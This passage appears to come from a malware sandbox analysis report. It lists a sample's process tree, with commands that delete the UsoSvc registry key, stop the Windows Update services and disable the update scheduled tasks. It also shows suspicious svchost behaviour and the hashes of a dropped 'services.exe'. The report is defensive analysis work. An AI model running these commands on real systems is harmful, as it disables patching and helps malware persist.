          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          - Modifies registry key
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop dosvc
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop wuauserv
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop WaaSMedicSvc
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop UsoSvc
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          - Modifies registry key
    [3] C:\Windows\System32\conhost.exe
        Command line: C:\Windows\System32\conhost.exe
      [4] C:\Windows\System32\conhost.exe
          Command line: "C:\Windows\System32\conhost.exe" "ayfzchqlcjzzno"
    [depth not recorded on the page] C:\Windows\System32\svchost.exe
        Command line: C:\Windows\System32\svchost.exe hhmzomdryxklm1
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Windows\services.exe
Filesize: 7.6MB
MD5: 95104aa61ed30687c13e5c644d5722f3
SHA1: f9788f808044d448f73203d93da0021cefb781ff
SHA256: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA512: 99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize: 539B
MD5: 84f2160705ac9a032c002f966498ef74
SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57